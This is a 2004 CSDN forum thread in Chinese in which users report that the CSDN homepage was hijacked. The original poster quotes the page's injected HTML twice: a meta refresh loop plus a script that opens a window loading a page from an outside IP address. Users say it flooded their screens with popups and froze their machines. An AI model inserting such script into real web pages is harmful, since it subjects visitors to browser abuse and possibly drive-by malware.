CSDN首页怎么了??????

Iamfish 2004-03-18 09:30:55
CSDN首页怎么了??????

<html>
<meta http-equiv='Pragma' content='no-cache'>
<meta http-equiv='Refresh' content='0;URL=?curtime=1079573115'>
<script>
window.open('http://218.247.166.42/ring3.htm', '', 'width=350,height=350');
</script>
<head>
<title></title>
</head>
<body>
</body>
</html>
...全文
119 22 打赏 收藏 转发到动态 举报
写回复
用AI写文章
22 条回复
切换为时间正序
请发表友善的回复…
发表回复
rainsome 2004-03-20
  • 打赏
  • 举报
回复
现在 好像没问题了.
Iamfish 2004-03-20
  • 打赏
  • 举报
回复
CSDN 怎么没出来解释一下啊??
ietey 2004-03-20
  • 打赏
  • 举报
回复
是呀,我这里一直都没问题呀。中招的几位朋友赶快买彩去吧。
潜水的鱼 2004-03-20
  • 打赏
  • 举报
回复
晕, ~是运气太好了,所以中招,赶紧买彩去,说不定500W就是你的了
minghui000 2004-03-20
  • 打赏
  • 举报
回复
up..你们机太烂。所以就中招了。
dragonlyf 2004-03-20
  • 打赏
  • 举报
回复
我好象没碰到哎
bluebaby00 2004-03-20
  • 打赏
  • 举报
回复
正常……老虎也有休息的闭眼的时候。。。
flying310 2004-03-18
  • 打赏
  • 举报
回复
我根本就上不去。
driftarter 2004-03-18
  • 打赏
  • 举报
回复
我没事,强烈关注中...
心云意水 2004-03-18
  • 打赏
  • 举报
回复
晕!
从来不去首页,不知道还有这个……?
cjf1009 2004-03-18
  • 打赏
  • 举报
回复
这几天就老犯毛病!!
carper 2004-03-18
  • 打赏
  • 举报
回复
正在查原因。
nffly 2004-03-18
  • 打赏
  • 举报
回复
肯定是被黑了!!!
Iamfish 2004-03-18
  • 打赏
  • 举报
回复
首页根本就打不开啊。我用MyIE,是拦掉了。

CSDN被黑了?还是.....

主页的内容是这些: 

<html>
<meta http-equiv='Pragma' content='no-cache'>
<meta http-equiv='Refresh' content='0;URL=?curtime=1079573115'>
<script>
window.open('http://218.247.166.42/ring3.htm', '', 'width=350,height=350');
</script>
<head>
<title></title>
</head>
<body>
</body>
</html>
PPLUNCLE 2004-03-18
  • 打赏
  • 举报
回复
一打开CSDN首页...就打开N个窗口..
害得我机器都死了..
后来开启广告窗口拦截,我倒...那数字不断增加
QQgenie 2004-03-18
  • 打赏
  • 举报
回复
我用MwIE,该拦截的都拦了,不说还真不知道有这回事.
zjcxc 2004-03-18
  • 打赏
  • 举报
回复
好在我没事
liuyu202 2004-03-18
  • 打赏
  • 举报
回复
怎么了?
我的没问题阿!
PPLUNCLE 2004-03-18
  • 打赏
  • 举报
回复
我也是啊...
denghan 2004-03-18
  • 打赏
  • 举报
回复
我也中招了,谁干的?!!
加载更多回复(2)

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧